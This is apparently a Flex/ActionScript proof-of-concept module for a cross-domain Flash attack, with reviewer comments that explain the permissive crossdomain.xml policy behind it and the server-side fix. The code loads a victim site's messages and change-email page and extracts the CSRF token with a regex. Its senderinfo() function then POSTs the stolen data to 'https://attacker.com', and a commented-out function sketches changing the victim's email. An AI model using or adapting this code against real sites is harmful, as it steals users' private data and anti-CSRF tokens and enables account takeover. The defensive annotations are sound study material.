@pwneddesal
Last active May 23, 2017 03:10
<?xml version="1.0" encoding="utf-8"?>
<mx:Module xmlns:fx="http://ns.adobe.com/mxml/2009"
xmlns:s="library://ns.adobe.com/flex/spark"
xmlns:mx="library://ns.adobe.com/flex/mx"
implements="interfaces.IModule1"
layout="vertical" width="100%" height="100%">
<!--
  Proof-of-concept Flex module. Each of its two buttons makes a URLLoader
  request to a fixed URL on VICTIM.com and forwards what comes back to the
  URL held in `attackerdomain`.

  Reviewer note (defensive reading): Flash Player lets a SWF read a response
  from another domain only when that domain's cross-domain policy file
  (crossdomain.xml) admits the SWF's origin. The condition demonstrated here
  is therefore presumably an over-permissive policy on the target host. The
  policy itself is not shown in this file. The remedy sits on the server:
  list only specific trusted domains in allow-access-from, or remove the
  policy file where no Flash client needs it.
-->
<fx:Script>
<![CDATA[
import contexts.Module1Context;
import flash.net.*
import by.blooddy.crypto.serialization.JSONer;
import interfaces.IModule1;
import org.robotlegs.core.IInjector;
import flash.text.TextField;
import flash.external.ExternalInterface;
// Context created in the parentInjector setter below; not read anywhere else in this file.
private var context:Module1Context;
// One URLLoader shared by every request in this module. Handlers added to it are
// never removed in the visible code, so a later load() on the same loader also
// reaches handlers registered by earlier calls.
private var loader:URLLoader = new URLLoader();
// Destination that senderinfo() POSTs to; the value appears to be a placeholder.
private var attackerdomain:String = 'https://attacker.com';
/**
 * Injection point: receives the parent injector and builds this module's
 * Module1Context from it.
 *
 * @param value Injector supplied by the host application.
 */
[Inject]
public function set parentInjector(value:IInjector):void
{
context = new Module1Context(this, value);
}
/**
 * Empty teardown hook; presumably required by interfaces.IModule1 (the
 * interface is not visible here).
 */
public function dispose():void
{
}
//private function buttonClick():void {
// ExternalInterface.call('console.log(2)');
//}
/**
 * Requests `url` through the shared loader and registers _onCompleteJSON as
 * the completion handler.
 *
 * @param url Address to load.
 */
private function ajaxbuttonClick(url:String):void
{
var _req:URLRequest = new URLRequest(url);
loader.addEventListener(Event.COMPLETE, _onCompleteJSON);
loader.load(_req);
}
/**
 * Requests `url` through the shared loader and registers _onComplete (the
 * token-matching handler) as the completion handler.
 *
 * @param url Address to load.
 */
private function extractClick(url:String):void
{
var _req:URLRequest = new URLRequest(url);
loader.addEventListener(Event.COMPLETE, _onComplete);
loader.load(_req);
}
/**
 * Click handler of the "read message1" button: loads a fixed messages URL on
 * VICTIM.com via ajaxbuttonClick().
 */
private function readmessage():void
{
ajaxbuttonClick('https://www.VICTIM.com/callback/messages/show/VICTIMcom');
}
/**
 * Click handler of the "extract token" button: loads the change-email
 * settings page on VICTIM.com via extractClick().
 */
private function extract_token():void
{
extractClick('https://www.VICTIM.com/settings/change-email');
}
// The block below is commented out in the original and is not part of the running module.
/**private function change_email():void
{
ExternalInterface.call('alert(1)');
urlRequest.data = 'POST_PARAMETER_HERE&user_settings_change_email[_token]=' + extract_token() ;
urlRequest.method = 'POST';
loader.addEventListener(Event.COMPLETE, shithappen);
loader.load(urlRequest);
}**/
/**
 * Empty stub; referenced only from the commented-out change_email() above.
 */
private function shithappen():void
{
}
/**
 * Completion handler for extractClick(): reads the loaded response as a
 * string, matches it against a pattern for a `_csrf_token` form field, shows
 * a fixed-offset slice of the second array element via ExternalInterface
 * alerts, and passes the same slice to senderinfo().
 *
 * Reviewer note: an anti-CSRF token embedded in a page protects only while
 * other origins cannot read that page. Where a cross-domain policy permits
 * the read, the token is exposed together with the rest of the response.
 *
 * @param e COMPLETE event from the shared loader (unused; the handler reads
 *          loader.data directly).
 */
private function _onComplete(e:Event):void {
var str:String = loader.data;
var pattern:RegExp =/(_csrf_token" value="(.+)">)/g;
var results:Array = str.match(pattern);
ExternalInterface.call('alert', 'notjson');
// Offsets 20 and 63 are hard-coded; presumably tied to the target page's markup.
ExternalInterface.call('alert', results[1].slice(20, 63));
senderinfo(results[1].slice(20, 63));
}
/**
 * Completion handler for ajaxbuttonClick(): passes the escape()-encoded
 * response body to a JavaScript prompt and to senderinfo().
 *
 * @param e COMPLETE event from the shared loader (unused).
 */
private function _onCompleteJSON(e:Event):void {
ExternalInterface.call('prompt', escape(loader.data));
senderinfo(escape(loader.data));
}
/**
 * POSTs `data` as the request body to the URL in `attackerdomain`, reusing
 * the shared loader, and logs a console message when that load completes.
 *
 * @param data String to send.
 */
private function senderinfo(data:String):void{
var _req:URLRequest = new URLRequest(attackerdomain);
_req.method = 'POST';
_req.data=data
loader.addEventListener(Event.COMPLETE, function(event:Event):void {
ExternalInterface.call('console.log("info has been send to attacker domain")');
}
);
loader.load(_req);
}
]]>
</fx:Script>
<!-- Each button triggers one of the two fixed-URL requests defined in the script block. -->
<s:Button id="button" label="read message1" click="readmessage()" />
<s:Button id="button1" label="extract token" click="extract_token()" />
</mx:Module>